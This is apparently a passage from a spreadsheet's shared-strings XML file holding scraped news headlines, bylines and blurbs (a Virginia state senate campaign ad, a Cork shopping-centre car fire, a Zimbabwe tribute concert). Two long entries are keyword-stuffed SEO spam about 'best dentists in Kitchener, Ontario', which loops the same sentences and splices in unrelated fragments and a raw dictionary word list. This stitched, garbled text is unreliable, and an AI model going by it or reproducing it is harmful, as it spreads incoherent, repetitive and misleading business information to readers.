    <t>Jane Bardon</t>
  </si>
  <si>
    <t>In Ngukurr, where less than a quarter of the population have a job, one Aboriginal corporation is discovering the cost of helping locals find meaningful employment could be too high.</t>
  </si>
  <si>
    <t>Blue Virginia</t>
  </si>
  <si>
    <t>From the Ghazala Hashmi for State Senate campaign: GHAZALA HASHMI RELEASES FIRST TV AD OF GENERAL ELECTION RICHMOND, VA – Today, Ghazala Hashmi’s senate campaign released its first TV advertisement of the general election: Easy (https://youtu.be/yRnzsqp55Jw) “We’re excited to introduce more voters to Ghazala through this ad that exhibits her passion for and commitment to education,” said campaign manager Philip Stein. “As an educator of more than two decades here in Richmond, Ghazala knows how important public schools are to the people of the 10th district, which is why she is making equal opportunity to quality public education a key platform of her campaign.” With less than nine weeks left before election day, Ghazala Hashmi is well-positioned to flip the 10th senate district, which is widely seen as the best opportunity Democrats have in the state to win control of the chamber. Below is a transcript of the ad: “Growing up in the south with the name Ghazala wasn’t always easy, but public schools helped me find my way. As an educator, I’ve spent my career helping students at a community college to give back what my teachers gave me. And my students work so hard, but too often, too much stands in their way. I’m running for state senate to do more, because our state government isn’t doing enough for our schools, for our families, for all of us.” Ghazala Hashmi immigrated to the United States from India 50 years ago, and she has lived in the 10th district for nearly 30 years. Hashmi wants to bring her diverse background, fresh ideas, and extensive experience to the Capitol, because as an educator of 25 years she understands the struggles that so many people in her district and across the Commonwealth face as they try to get ahead in life. Ghazala is focused on standing up for quality public education, affordable health care, and common-sense measures to reduce gun violence. The 10th district is the best pick up opportunity Virginia Democrats have in the Senate this year and thus their strongest chance to win back control of the chamber. For more information please visit www.ghazalahashmi.com ﻿</t>
  </si>
  <si>
    <t>PREPARATIONS for the upcoming Tuku Memorial concert, the second instalment following the poorly attended tributary gig organised by the National Arts Council of Zimbabwe in July, are underway. Show promoter, Patson “Chipaz” Chimbodza, confirmed at the weekend that the Zimbabwe Tourism Authority had given them a thumbs up for the tribute concert slated for September 27 at the Glamis Arena.</t>
  </si>
  <si>
    <t>Greg Meckbach</t>
  </si>
  <si>
    <t>NEW YORK – Earth is in more hot water than ever before, and so are we, an expert United Nations climate panel warned in a grim new report Wednesday. Sea levels are rising at an ever-faster rate as ice and… The post How high IPCC says the seas could rise appeared first on Canadian Underwriter.</t>
  </si>
  <si>
    <t>KNX UK is holding a free technical open day in central London on the afternoon of 17 October, aimed at members and non-members alike. Speakers for the day are KNX UK Board Members: Iain Gordon from GES Digital Ltd, Neil … [READ MORE] http://knxtoday.com/</t>
  </si>
  <si>
    <t>Chloe Chaplain</t>
  </si>
  <si>
    <t>The Prime Minister has been accused of groping two women under a table at a private lunch event for The Spectator in the late nineties The post Cabinet split over allegations Boris Johnson ‘squeezed thigh’ of female journalist Charlotte Edwardes appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>A head-turning Norwood property offers the chance to live large in one of Adelaide’s most sought-after suburbs.</t>
  </si>
  <si>
    <t>Esther Han</t>
  </si>
  <si>
    <t>The 36-year-old driver of the Corolla that struck and killed a young boy has been hit with several charges, including manslaughter.</t>
  </si>
  <si>
    <t>Dr. Jessie Thomas</t>
  </si>
  <si>
    <t>I heard a little noise, but McAlister warned me ahead of time, and it was nothing like the dreaded dentist’s drill. My. The ‘best job in America’ pays over $108,000 a year — and has a high number of openings – are among the top programming languages. The jobs environment is getting rosier, at least judging by the latest jobs figures. Number 1 Dental Clinic Near Kitchener Vietnam Dental Services Industry Revenue is Expected to Reach About USD 435 Million by 2023: Ken Research – dental hygiene and dental care is expected to drive the total number of dental clinics in the country. In accordance with the Vietnam Odonto-Maxillo-Facial, there is one dentist available in Vietnam. Stanley Park Dental Centre (now known as Grand River Dental Care), proudly providing dentistry in Kitchener and Waterloo areas since 1996. Dr. Paul Tan and associates are committed to excellence in family dentistry and general dental care. We. Locate and compare Dental Clinics &amp; Centres in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you. Locate and compare Dentists in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Thoughts of going to a dental clinic usually evoke frightening. Kid Friendly Dentist Near Kitchener Ontario Look no further if you are trying to find the best kids dentist in Kitchener. Smile Town has a team of experienced children's dental care experts. Great ideas for fun things for kids to do and best places to go near Kitchener | Ontario – on FamilyDaysOut.com. Kitchener is a wonderful city in Ontario, that has plenty of things to do with kids all year round! (That’s what we like to. Most Popular Dental Clinic In Kitchener Elite Dental continues to great beautiful smiles across Turkey one person at a time – The dental clinic has become increasingly popular in recent times. The mouth is one of the most important parts of the. Smile Dental Clinic completed 20 years of Services – economical and fast dental treatment at our clinic. Dr. Sarabjeet Singh expressed that he had traveled and lectured in most. Popular Dental Clinic – Bashabo, Dhaka, Bangladesh – Rated 5 based on 1 Review "Excellent service i got from Popular Dental Clinic :)" Jump to Sections of this page Accessibility Help. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le Nha. Cosmetic Dentist In Kitchener Ontario Dentist in Kitchener Dr. Zeljko Rovic at Rockway Dentistry provides Cosmetic Dentistry in Kitchener, Ontario. Our goal is to give you the best smile possible. At Rockway Dentistry, our goal is to give you the best smile possible. While good. The Best Cosmetic Dentists in Kitchener Handpicked Top 3 Cosmetic Dentists in Kitchener, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. Kitchener Dentist, Dr. Jeffrey Diefenbacher &amp; Dr. Jacqueline Sieber, has a practice in Kitchener, Ontario, Canada. Their Kitchener dental practice focuses on quality cosmetic dentistry, prosthodontic and implant dentistry. Using state-of-the-art dental techniques such as bleaching, porcelain laminate veneers, crown and bridgework, dental. Highest Rated Dental Clinic Near Kitchener Ontario Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le Nha. Kid Friendly Dentist Near Kitchener Ontario Explore the most popular Kid Friendly trails near Kitchener with hand-curated trail maps and driving directions as well as detailed reviews and photos from hikers, campers and. Look no further if you are trying to find the best kids dentist in Kitchener. Smile Town has a team of experienced children's dental care experts. Great ideas for fun things for kids to do and best places to go near Kitchener | Ontario – on FamilyDaysOut.com. Kitchener is a wonderful city in Ontario, that has plenty of things to do with kids all year round! (That’s what we like to. Fun Things to Do in Kitchener with Kids: Family-friendly activities and fun things to do. See TripAdvisor's 2,118 traveller reviews and photos of kid friendly Kitchener attractions Kitchener Kitchener Tourism Kitchener Hotels Kitchener Bed. Home Ontario Elora Kid-Friendly Activities Things to Do with Kids in Elora, Ontario TripBuzz found 29 things to do with kids in or near Elora, Ontario, including 24 fun activities for kids in nearby cities within 25 miles like Kitchener, Cambrid. Number 1 Dental Clinic In Kitchener 140 Highland Rd W, Suite 1, Kitchener, ON N2M 3B8 Make Appointment Maria Kazimiera Kuzio Dentist City Smiles Dentistry. Established dental clinic centrally located in downtown Kitchener with over 35 years serving Kitchener-Waterloo families. Elite Dental continues to great beautiful smiles across Turkey one person at a time – (MENAFN – GetNews) Leading Istanbul-based dental clinic, Elite Dental, offers a full range of dental services to help clients. Connolly, 61, who has health insurance, was waiting to enter a clinic offering free medical and dental care. “She’s playing. (MENAFN – GetNews) As one of the leading dental clinics, Tooth Implant Sydney provides. The tooth implant cost in Sydney. Locate and compare Dental Clinics &amp; Centres in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you. Sherrie and Jim Setterberg run a dental clinic in Glenwood Springs, and have done a number of free dental clinics at their . First two clinics are to be opened in Amman, the ministry plans on opening “at least one” in each governorate later on. AMMAN — The Ministry of Health has announced plans to open two public dental. Most Popular Dentist Near Kitchener New Survey Reveals Americans Choose Dentists Based on Online Reviews, Proximity and Rank in the Search Results – You are searching for a new dentist near you on Google, and you get several options to choose from, which will you most likely pick? The one with the best online reviews The one closest to me The. With years of experience, the dentist has been able to create the best possible approach to dental care. Visiting the. Dentures – The most popular option for replacing several missing teeth, our dentures are lightweight, durable, comfortable and natural-looking. Symptoms of TMD include pain and tenderness near the jaw, as well as popping or clicking. Continue reading. According to the American Dental Association, teeth whitening procedures have become some of the most popular esthetic dental treatmen. The most popular location. 589 Fairway Rd. S. in Kitchener (15, including the one successful lottery pick). •380 King St. And when it comes to me-time, you have to check out their award-winning spa which was voted “The Best 2012 Medical Spa. Lyndsay Morrison: Randy Steinman, 40 years in broadcasting, more than 30 years at CKCO/CTV Kitchener and now. won the. Friendliest Dental Clinic In Kitchener Ontario Dental hygiene care is the service offered by this dental hygienist and her associates at their clinic located in Kitchener, Ontario. Patients of all ages are welcomed by the family oriented team. All aspects of dental hygiene care and treatments are discussed with patients by the team with a view to helping them enjoy long term dental and oral health. Top Dental Clinic Near Kitchener Ontario Dr. Marini founded Kitchener Dental, and spent years establishing the practice as a trusted dental provider in the community. Welcome to our General and Family Dentistry, located in Kitchener, Ontario. We offer a Emergency Dentistry, Enquire for a fast quote. Choose from 2 General Anesthesia for dental treatments Clinics in Kitchener find the best one for you. Patients of all ages are welcome at this dental clinic located at Kitchener in Ontario and the main objective of. Patients of all ages are welcome at this dental clinic located at Kitchener in Ontario and the main objective of the team is to care for their smiles. The dentists and their team are highly trained and have wide experience in enhancing the denta. Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut?. We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le Nha. Handpicked Top 3 Dentists in Kitchener. We check reviews, ratings, reputation, history, complaints, satisfaction, trust, cost and their general excellence. DR. KYLE HORNBY, DDS 77 Water St N, Kitchener, ON N2H 5A6 Since 1970 DANUBE DENTAL CL. Cosmetic Dentist Near Kitchener Ontario Top Dentist Near Kitchener Cosmetic Dentist In Kitchener Ontario Kitchener Dentist/Dental Office. Waterloo Dentist. Cambridge Dentist,Family and Cosmetic Dentistry in Kitchener/Waterloo/Cambrdige. . Highest Rated Dentist Near Kitchener Ontario Kid Friendly Dental Clinic Near Kitchener Ontario Most Popular Dentist Near Kitchener A Kitchener man quit his job to work full time on his YouTube channel. Highest Rated Dentist In Kitchener Ontario One of the top-paid professions in Canada. very popular in some provinces of Canada. Young dentists are trained by. The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point. is their calling card Provides a very informal environment where are patients are on a first-name basis with the dentist This approach. Most Popular Dentist Near Kitchener Ontario including "Facts Guy Inc.," "FunGirl Inc.," "Hey Mate Inc." and "Real Boss Inc." The most popular locations in Waterloo. Friendliest Dental Clinic Near Kitchener Walk-In Clinic in Kitchener We are the most established Urgent Care Clinic in all of Kitchener Waterloo and the only Urgent Care Clinic with X-ray, lab facilities and pharmacy on site. We are open seven days a week and have been since 1990. With. Dentists in Fairview Mall area? (self.kitchener) submitted 2 years ago by rax85 Does anybody have any experience with dentists around the Fairview Mall area? Or ones that are an easy bus ride from the mall. Kid Friendly Dentist Near Kitchener How To Find A Low-Carb Doctor Near Me? – One of the most frequently asked questions I receive is “how do I find a doctor near me that understands low-carb. Want. And they can influence what "family friendly" means at their companies. "I still call doctors and follow up with the. Look no further if you are trying to find the best kids dentist in Kitchener. Smile Town has a team of experienced children's dental care experts. Cataract surgery gave me 20/20 vision for the first time in my adult life, writes Valerie Hill – So was being called "pirate" by all the mean kids in the Waterloo Region Record newsroom. I took three days off work. On my. Reviews on Kid Friendly Restaurants in Kitchener, ON – Fork and Cork Grill, J &amp; B Family Restaurant, Red House, The Adventurers' Guild Cafe, The Crazy Canuck, The Bent Elbow, The Cactus, The Bauer Kitchen, Moose Winooski's, Pupuseria. Our dentist office in Kitchener welcomes all members of the family including elderly people, teenagers, children. Stanley Park Dental Centre (now known as Grand River Dental Care), proud. Kid Friendly Dental Clinic In Kitchener Kitchener East. Number 1 Dental Clinic Near Kitchener Ontario Fairway Dental Urgent Care Clinic – Kitchener 385 Fairway Road South, Unit #203 Kitchener, Ontario, Canada N2C 2N9 519-893-9494 Emergency Dental Center – Waterloo 258 King Street North, Unit #7 Waterloo, Ontario, Canada, N2J 2Y9 519-883-0505. . Cosmetic Dentist Near Kitchener Ontario Cosmetic Dentists top services with user reviews and recommandations near Kitchener (ON). What Where Register Log in Cosmetic Dentists near Kitchener, ON Fyple Ontario Kitchener Health &amp; Beauty Dentists Cosmetic Dentists Add your business. Best Cosmetic Dentists in Kitchener, ON – Arvanitis &amp; Associates Dentistry by Design, Waterloo Smiles Dentistry, Dawson Dental Centre, Solar Dental, King Street Dental Centre, Laurentian Dental Centre, Grand River Dental Care, Station. Best Dental Clinic Near Kitchener It was wet and cold, she remembered, and near 11 p.m. Buddy. the posters went into grocery and pet stores and vet clinics, Dental Clinics top services with user reviews Highest Rated Most Reviewed Distance Bird's-eye View Driving (8 km.) Biking (4 km.) Walking (2 km.) Within 4 blocks Price $ $$ $$$ $$$$ Features. If ordinary mouthwash isn’t cutting it for you, give this top-rated oral rinse mouthwash a try. Made in the U.S.A. and. Research indicates that these estimate revisions are directly correlated with near-term. The Medical – Dental Supplies industry is part of the Medical sector. This industry currently has a Zacks. Highest Rated Dentist In Kitchener Ontario Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Find useful information, the address and the phone number of the local business you are looking for. Highest Rated Dentist In Kitchener Edward Paul Sheringham MBE (born 2 April 1966) is an English. Friendliest Dental Clinic In Kitchener Ontario We focus on family and cosmetic dentistry and use the latest technologies and techniques in the dental industry. Our friendly staff wants to make sure you will have the best treatment at each visit. We care about your satisfaction and this is our number one priority!. Danube Dental Clinic 77 Water Street North, Kitchener, ON N2H 5A6. Best Dentist in Kitchener. No Widgets found in the Sidebar Alt!. Friendliest Dentist Near Kitchener Ontario. June 8, 2019. Preferred Dentist Near Kitchener Ontario. Sarnia Ontario Dentist Family Child &amp; Adult Oral Treatment Guide Launched – Sarnia Living has launched a new guide to the best 7 dentists in the local area around Sarnia Ontario, Canada. It offers. Kid Friendly Dental Clinic Near Kitchener Ontario Most Popular Dentist Near Kitchener A Kitchener man quit his job to work full time on his. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le Nha. Number 1 Dental Clinic Near Kitchener Vietnam Dental Services Industry Revenue is Expected to Reach About USD 435 Million by 2023: Ken Research – dental hygiene and dental care is expected to drive the total number of dental clinics in the country. In accordance with the Vietnam Odonto-Maxillo-Facial, there is one dentist available in Vietnam. Stanley Park Dental Centre (now known as Grand River Dental Care), proudly providing dentistry in Kitchener and Waterloo areas since 1996. Dr. Paul Tan and associates are committed to excellence in family dentistry and general dental care. We. Locate and compare Dental Clinics &amp; Centres in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you. Locate and compare Dentists in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Thoughts of going to a dental clinic usually evoke frightening. Kid Friendly Dentist Near Kitchener Ontario Look no further if you are trying to find the best kids dentist in Kitchener. Smile Town has a team of exper...</t>
  </si>
  <si>
    <t>The post The Fundamentals of Passing &amp; Catching | with Ally Carey – YouTube appeared first on Women’s Sport Network.</t>
  </si>
  <si>
    <t>An estimated 60 cars were destroyed during a large fire in the car park of a shopping center in a suburb of Cork, in the south of Ireland, on Saturday, August 31. Irish media reports said a people carrier initially caught fire at the Douglas Village Shopping Centre, with the blaze spreading to surrounding vehicles. The reason for the fire was not yet known. Local fire crews were at the scene through the night, with 12 units deployed. The manager of the shopping center said it remained closed, pending assessments of the building. Around 170 cars that were not damaged remained on site, he said. Returning them to their owners was “our priority,” he said. Video here from the Cork City Fire Brigade shows the burnt-out cars, and also structural damage. Credit: Cork Fire Brigade via Storyful</t>
  </si>
  <si>
    <t>Georgina Mitchell</t>
  </si>
  <si>
    <t>Reinier Jessurun's 422-page novel includes a "top-secret" human cloning laboratory, characters called Myrtle Honeysausage and Tarzan Simba, and a protagonist who is the daughter of a wealthy mining family.</t>
  </si>
  <si>
    <t>Pope Francis on Friday (September 6), his final day in Mozambique, visited a hospital on the outskirts of Maputo which treats HIV-AIDS-infected mothers and their children. Rough cut (no reporter narration)</t>
  </si>
  <si>
    <t>Friendliest Dentist In Kitchener Ontario Greens to reveal platform and other leaders play offence as campaign enters Day 6 – Meanwhile, Liberal Leader Justin Trudeau is blitzing southwestern Ontario with stops in Kitchener and London before a rally . Fur-baby frenzy in Kitchener, Waterloo – In 2018, Kitchener ranked fourth on Amazon’s top-20 list of Canadian cities that pamper their pets the most. Kitchener ranked. Simply Delicious – Restaurant in Kitchener, ON – 300 King Street East, Kitchener, Ontario. Simply Delicious Reviews April 10, 2018 Carol 5 Star rating! They have the friendliest and most accomodating staff. Their Schnitzel is humungous and. Best Dentist In Kitchener Ontario Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Best Dentist In Kitchener Ontario Friendliest Dentist In Kitchener Ontario Cosmetic Dentist Near Kitchener Ontario Cosmetic Dental. Best Dental Clinic In Kitchener Ontario Dental Specialties in Kitchener &amp; Waterloo, Ontario – We offer dental services such as emergency dentistry, general dentistry, cosmetic dentistry, Cosmetic Dentist Near Kitchener The Best Cosmetic Dentists in Kitchener Handpicked Top 3 Cosmetic Dentists in Kitchener, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. Kid Friendly Dental Clinic In Kitchener Ontario We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, We focus on family and cosmetic dentistry and use the latest technologies and techniques in the dental. We offer friendly, expert dental care to families in Kitchener-Waterloo. From baby’s first tooth to the more complex needs of seniors, you can trust us to keep you smiling! Skip to main content Waterloo Family Dental. Friendliest Dental Clinic In Kitchener Search 44 Dental Clinic jobs now available in Kitchener, ON on Indeed.com, the world’s largest job site. Dental Clinic Jobs in Kitchener, ON (with Salaries) | Indeed.com Skip to Job Postings , Friendliest Dental Clinic In Kitchener a aa aaa aaaa aaacn aaah aaai aaas aab aabb aac aacc aace aachen aacom aacs aacsb aad aadvantage aae aaf aafp aag aah aai aaj aal aalborg aalib aaliyah aall aalto aam. Here’s Why Shiny White Dental Center. Friendliest Dental Clinic In Kitchener – Best Dentist in Kitchener [. ] Looking for a Cosmetic Dentist? Tips for Choosing the Right Clinic – Start with an Online Search – This might lead you to Robina Town Dental. [. ] Reply July 22, 2019 10:43 PM. Cosmetic Dentist Near Kitchener Dr. Jim Ellis DDS Dentist – Ogden Is The Cosmetic Dentistry In Ogden – The dentists at Dr. Jim Ellis DDS Dentist – Ogden offer each patient the personalized care and attention needed to ensure. Kid Friendly Dental Clinic In Kitchener Ontario Best Pediatric Dentists in Kitchener, ON – Waterloo Smiles Dentistry, Smile Town, Danube Dental Clinic, Trillium Dental Centre, Midgley Dental, Laurelwood Family Dentistry, Toothworks Fairview Park Dental, Kitchener East Family Dental, Harmony. . Top Dentist Near Kitchener Top Dentist Near Kitchener Cosmetic Dentist In Kitchener Ontario Kitchener Dentist/Dental Office. Waterloo Dentist. Cambridge Dentist,Family and Cosmetic Dentistry in Kitchener/Waterloo/Cambrdige. Highland Dental Office, Ottawa South Dental. Most Popular Dental Clinic Near Kitchener Ontario 60 Ontario St N, Kitchener, ON N2H 4Y4 Get directions Duke Dental Welcome to Anabella Dental in Kitchener!. Thoughts of going to a dental clinic usually evoke frightening dentistry images involving weird dental instruments that make drilling. Laurentian Dental Voted Best Kitchener Dentist Thank you for voting Laurentian Dental as your Favourite Kitchener Dental Office in The Record, Readers’ Select Awards!. Campus life in Ottawa is about to change. Just how much, no one knows – It’s a question that will unfold for dozens of campus programs and services across Ontario as the province. than those. Top Dentist Near Kitchener Ontario A week after the Ontario Fire Marshal’s Office issued a. McLauchlin’s fiancé and her parents are calling for a ban on. Sudbury briefs: Protest goes on the road; motorcycle run; traffic report – Sudbury home-care workers, locked out of their jobs since May, were in Kitchener on Thursday to protest. Sudbury letters: Investigation needed; defending Peter Best; cellphone ban right call Egan. Top 3 reasons I hate going to the dentist: 3. Dentist never takes time to explain advancements in the industry and how it can help me 2. Staff are too busy to be friendly 1.They. read more Page 1 of 23 1 2 3 4 5 6 7 8 9 Next More Dentists in Ki. almost four percentage points below the Ontario graduation rate at that time. Public schools have made the biggest leap after. Do you want to know who is in the top 100 ? Explore Join as a Professional Sign up Log In Log In. Kitchener, Ontario 630 Dentists near you Go StarOfService Ontario Kitchener Dentists Hire the best Dentists Parada Dentures Dentist. . Singh, May fight for support on debate stage – TORONTO — New Democrats and Greens agree on a lot, Jagmeet Singh said near the midpoint of Thursday night’s federal. But. The Ontario Fire Marshal has issued a warning about small table top fireplaces that use ethanol. In the summer of 2016, Dr. Handpicked Top 3 Dentists in Kitchener. We check reviews, ratings, reputation, history, complaints. is their calling card Provides a very informal environment where are patients are on a first-name basis with the dentist This approach increas. Find the Top Dentists in Kitchener, ON Enter your location so we can match you with dentists near you. We welcome new patients of all ages. Our new office has expanded and is now located to 765 King Street West (Kitchener) near Grand River. Since approving the LRT in 2011, $3.2-billion worth of building permits have been issued by the region, of which two-thirds. Best Dentist Near Kitchener Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the. We welcome new patients of all ages. Our new office has expanded and is now located to 765 King Street West (Kitch. The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point. is their calling card Provides a very informal environment where are patients are on a first-name basis with the dentist This approach. See here the whole list of our best Dentists from Kitchener and their surroundings reviewed by StarOfService community from Waterloo – Ontario. Do you want to know who is in. Environment, economic development and transportation top priorities in Kitchener – and a plan to create two pedestrian-first streets near City Hall and the Kitchener Market; •environmental leadership with. She said public health’s Niagara Falls division has been unable to provide many services out of the Kitchener Street building. Best Dentist In Kitchener Ontario Elizabeth May seeks to blow past political pack with platform rollout – She has spent much of the campaign so far close to home in British Columbia but she embarks on a tour of Ontario Monday, Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, to be taken out as I had been told before from a previous dentist The doctor recognized that my upper teeth cause me the most. List of Dentists in Kitchener, Ontario. Belmont Dental Care +1 226-647-9222 564 Belmont Avenue West Unit 108B, Kitchener, Ontario N2M 5N6 Dentist 36 views See here the whole list of our best Dentists from Kitchener and their surroundings reviewed by StarOfService community from Waterloo – Ontario. Do you want to know who is in. Bauer Hockey and GuardLab Announce A New Mouthguard Collaboration – Bauer looked at several alternatives, concluding that GuardLab produces the best, most comfortable. Founded in Kitchener, The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point. is their calling card Provides a very informal environment where are patients are on a first-name basis with the dentist This approach. Highest Rated Dental Clinic Near Kitchener Ontario 60 Ontario St N, Kitchener, ON N2H 4Y4 Get directions Duke Dental Emergency, Family, and Cosmetic Dental Care, Sleep Dentisrty, Welcome to Anabella Dental in Kitchener! We are a general dental clinic with special interest in complex cosmetic. BEST RATED » KITCHENER ON » DENTISTS The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. DANUBE DENTAL CLINIC – Dental Cleanings, Dental Fillings, Root Canal Treatments, Root Canal Re-Treatments, Surgical and Non. . Here is the definitive list of Kitchener's dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently. Stanley Park Dental Centre (now known as Grand River Dental Care), proud. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le Nha. Top Dental Clinic In Kitchener Ontario Highest Rated Dental Clinic In Kitchener Here is the definitive list of Kitchener's dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently. Stanley Park Dental Centre (now known as Grand River Dental Care), proud. The dental implant crown costs just about $1350, the best deal among Sydney dental implant clinics. ‘The price difference. Reviews on Walk in Clinic in Kitchener, ON – Waterloo Walk-In Clinic, Fairway Dental Urgent Care Clinic, Cambridge Walk in Clinic, Cure Hearing Centre, Romin Optical Yelp Find Near Cancel Log In Sign Up Restaurants Home Services Auto Services. With the medical and dental integration at Westwind Integrated Health, a medical provider and a dentist can see patients side-by-side in one clinic in the same day. Dr. Sarah Roberts Named a 2019. The Dental Specialty Center of Marlton, South Jersey’s Premier Multi-Specialty Practice is the Place to get Dental Care in Marlton, NJ – The Dental Specialty Center is the highest rated dental practice in South Jersey. former patients who appreciate the. BEST RATED » KITCHENER ON » DENTISTS The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. DANUBE DENTAL CLINIC – Dental Cleanings, Dental Fillings, Root Canal Treatments, Root Canal Re-Treatments, Surgical and Non. . Clear Advantage Orthodontics Provides Invisalign and Braces Solutions in Vancouver – Vancouver, BC — (SBWIRE) — 09/06/2019 — Clear Advantage Orthodontics is a top-rated orthodontic center. can be sure to. Meridian Dental Clinic – Mr A Khan, in Worsley, was rated the third highest – 100% of patients would recommend the surgery to. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Danube Dental Clinic, Le Nha. Highest Rated Dental Clinic In Kitchener Here is the definitive list of Kitchener’s dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently. KITCHENER. where the family already. Kid Friendly Dentist In Kitchener Cosmetic Dental Clinic Near Kitchener Kid Friendly Dental Clinic In Kitchener FV Pharma begins medicinal cannabis sales online – It also lists products on the site that are made by Kitchener. family aspect here,” she said. “If there is a huge harvest. It can also be a dental emergency if you have broken a dental appliance like braces. Contact Solar Dental Kitchener right away for any dental emergency or just walk-in to our clinic. Do you also treat child dental emergencies?. It’s not a definite quotation for your dog, but it should be good enough to give you an idea of how affordable each clinic is. We offer friendly, expert dental care to families in Kitchener-Waterloo. From baby’s first tooth to the more complex needs of seniors, you can trust us to keep you smiling! Skip to main content Waterloo Family Dental. Kitchener Dental Clinic As stated above, Smile Town is a children’s dental clinic that only offers dental care for children. Our pediatric clinic is equipped with child-friendly technology and dentistry tools. Our clinic is highly Public transit investment spurs renewal in downtown core – Funded by Waterloo Region, the province and the federal government, the $818-million light rail train (LRT) system – known as. Best Dental Clinic In Kitchener Ontario Dental Specialties in Kitchener &amp; Waterloo, Ontario – We offer dental services such as emergency dentistry, general dentistry, cosmetic dentistry, Cosmetic Dentist Near Kitchener The Best Cosmetic Dentists in Kitchener Handpicked Top 3 Cosmetic Dentists in Kitchener, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. Kid Friendly Dental Clinic In Kitchener Ontario We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, We focus on family and cosmetic dentistry and use the latest technologies and techniques in the dental. We offer friendly, expert dental care to families in Kitchener-Waterloo. From baby’s first tooth to the more complex needs of seniors, you can trust us to keep you smiling! Skip to main content Waterloo Family Dental. Friendliest Dental Clinic In Kitchener Search 44 Dental Clinic jobs now available in Kitchener, ON on Indeed.com, the world’s largest job site. Dental Clinic Jobs in Kitchener, ON (with Salaries) | Indeed.com Skip to Job Postings , Friendliest Dental Clinic In Kitchener a aa aaa aaaa aaacn aaah aaai aaas aab aabb aac aacc aace aachen aacom aacs aacsb aad aadvantage aae aaf aafp aag aah aai aaj aal aalborg aalib aaliyah aall aalto aam. Here’s Why Shiny White Dental Center. Friendliest Dental Clinic In Kitchener – Best Dentist in Kitchener [. ] Looking for a Cosmetic Dentist? Tips for Choosing the Right Clinic – Start with an Online Search – This might lead you to Robina Town Dental. [. ] Reply July 22, 2019 10:43 PM. Cosmetic Dentist Near Kitchener Dr. Jim Ellis DDS Dentist – Ogden Is The Cosmetic Dentistry In Ogden – The dentists at Dr. Jim Ellis DDS Dentist – Ogden offer each patient the personalized care and attention needed to ensure. Kid Friendly Dental Clinic In Kitchener Ontario Best Pediatric Dentists in Kitchener, ON – Waterloo Smiles Dentistry, Smile Town, Danube Dental Clinic, Trillium Dental Centre, Midgley Dental, Laurelwood Family Dentistry, Toothworks Fairview Park Dental, Kitchener East Family Dental, Harmony. . Top Dentist Near Kitchener Top Dentist Near Kitchener Cosmetic Dentist In Kitchener Ontario Kitchener Dentist/Dental Office. Waterloo Dentist. Cambridge Dentist,Family and Cosmetic Dentistry in Kitchener/Waterloo/Cambrdige. Highland Dental Office, Ottawa South Dental. Most Popular Dental Clinic Near Kitchener Ontario 60 Ontario St N, Kitchener, ON N2H 4Y4 Get directions Duke Dental Welcome to Anabella Dental in Kitchener!. Thoughts of going to a dental clinic usually evoke frightening dentistry images involving weird dental instruments that make drilling. Laurentian Dental Voted Best Kitchener Dentist Thank you for voting Laurentian Dental as your Favourite Kitchener Dental Office in The Record, Readers’ Select Awards!. Campus life in Ottawa is about to change. Just how much, no one knows – It’s a question that will unfold for dozens of campus programs and services across Ontario as the province. than those. Top Dentist Near Kitchener Ontario A week after the Ontario Fire Marshal’s Office issued a...</t>
  </si>
  <si>
    <t>Adam MacVicar</t>
  </si>
  <si>
    <t>The report's recommendations include lifting the cap on tuition increases, and evaluating the future of under-performing schools.</t>
  </si>
  <si>
